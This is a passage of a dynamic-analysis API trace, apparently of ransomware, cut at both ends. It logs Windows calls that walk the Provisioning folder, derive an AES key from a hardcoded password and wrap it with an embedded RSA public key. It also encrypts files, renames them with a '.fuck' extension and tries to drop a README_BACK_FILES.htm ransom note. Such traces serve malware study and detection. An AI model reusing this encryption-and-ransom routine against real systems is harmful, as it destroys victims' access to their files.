"c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg")) returned 0 [0237.498] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.fuck")) returned 0 [0237.498] CryptDestroyHash (hHash=0x2846320) returned 1 [0237.498] CryptDestroyKey (hKey=0x28464e0) returned 1 [0237.498] CryptReleaseContext (hProv=0x2843e68, dwFlags=0x0) returned 1 [0237.498] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.499] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.499] GetLastError () returned 0x5 [0237.499] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml")) returned 0x20 [0237.499] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.499] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.500] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.500] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.500] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844bb0) returned 1 [0237.505] CryptCreateHash (in: hProv=0x2844bb0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.505] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.505] CryptHashData (hHash=0x2845ee0, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.505] CryptDeriveKey (in: hProv=0x2844bb0, Algid=0x6610, hBaseData=0x2845ee0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846360) returned 1 [0237.505] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.505] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.506] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2844aa0) returned 1 [0237.506] CryptImportPublicKeyInfo (in: hCryptProv=0x2844aa0, dwCertEncodingType=0x1, pInfo=0x284ef18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284ef48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284ef50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2845f60) returned 1 [0237.506] CryptEncrypt (in: hKey=0x2845f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.506] CryptEncrypt (in: hKey=0x2845f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844440*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2844440*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.506] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844440, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.506] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2763190, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.506] CryptEncrypt (in: hKey=0x2846360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763190*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2763190*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.507] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763190, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.507] CloseHandle (hObject=0xffffffff) returned 1 [0237.507] CloseHandle (hObject=0xffffffff) returned 1 [0237.507] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.507] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.507] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.gsg")) returned 0 [0237.508] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.fuck")) returned 0 [0237.508] CryptDestroyHash (hHash=0x2845ee0) returned 1 [0237.508] CryptDestroyKey (hKey=0x2846360) returned 1 [0237.508] CryptReleaseContext (hProv=0x2844bb0, dwFlags=0x0) returned 1 [0237.508] FindNextFileA (in: hFindFile=0x2846220, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.508] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28464e0 [0237.509] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.509] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.509] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28460e0 [0237.509] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.509] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.509] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.509] GetLastError () returned 0x5 [0237.509] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.509] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.510] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.510] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.510] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.511] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844bb0) returned 1 [0237.514] CryptCreateHash (in: hProv=0x2844bb0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.514] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.514] CryptHashData (hHash=0x2845ea0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.514] CryptDeriveKey (in: hProv=0x2844bb0, Algid=0x6610, hBaseData=0x2845ea0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846120) returned 1 [0237.514] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.514] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.514] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2844908) returned 1 [0237.514] CryptImportPublicKeyInfo (in: hCryptProv=0x2844908, dwCertEncodingType=0x1, pInfo=0x284f328*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f358*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f360*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2846020) returned 1 [0237.514] CryptEncrypt (in: hKey=0x2846020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.515] CryptEncrypt (in: hKey=0x2846020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2843e68*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2843e68*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.515] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2843e68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.515] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.515] CryptEncrypt (in: hKey=0x2846120, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.515] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.515] CloseHandle (hObject=0xffffffff) returned 1 [0237.515] CloseHandle (hObject=0xffffffff) returned 1 [0237.515] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.515] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.516] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.516] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.517] CryptDestroyHash (hHash=0x2845ea0) returned 1 [0237.517] CryptDestroyKey (hKey=0x2846120) returned 1 [0237.517] CryptReleaseContext (hProv=0x2844bb0, dwFlags=0x0) returned 1 [0237.517] FindNextFileA (in: hFindFile=0x28460e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.517] FindClose (in: hFindFile=0x28460e0 | out: hFindFile=0x28460e0) returned 1 [0237.517] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.517] AreFileApisANSI () returned 1 [0237.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28447f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.517] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.518] GetLastError () returned 0x5 [0237.518] GetLastError () returned 0x5 [0237.518] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.518] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.518] GetLastError () returned 0x5 [0237.518] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml")) returned 0x20 [0237.518] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.518] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.519] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.519] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.519] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2844b28) returned 1 [0237.522] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.522] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.522] CryptHashData (hHash=0x2845d60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.522] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2845d60, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2845de0) returned 1 [0237.522] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.522] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.522] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28446e8) returned 1 [0237.523] CryptImportPublicKeyInfo (in: hCryptProv=0x28446e8, dwCertEncodingType=0x1, pInfo=0x2850298*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28502c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28502d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2845e20) returned 1 [0237.523] CryptEncrypt (in: hKey=0x2845e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.523] CryptEncrypt (in: hKey=0x2845e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28447f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28447f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.523] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28447f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.523] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x2763998, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.523] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763998*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x2763998*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.523] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763998, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.523] CloseHandle (hObject=0xffffffff) returned 1 [0237.523] CloseHandle (hObject=0xffffffff) returned 1 [0237.524] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.524] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.524] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.gsg")) returned 0 [0237.524] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.fuck")) returned 0 [0237.525] CryptDestroyHash (hHash=0x2845d60) returned 1 [0237.525] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.525] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.525] FindNextFileA (in: hFindFile=0x28464e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.525] FindClose (in: hFindFile=0x28464e0 | out: hFindFile=0x28464e0) returned 1 [0237.525] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\README_BACK_FILES.htm" (normalized: 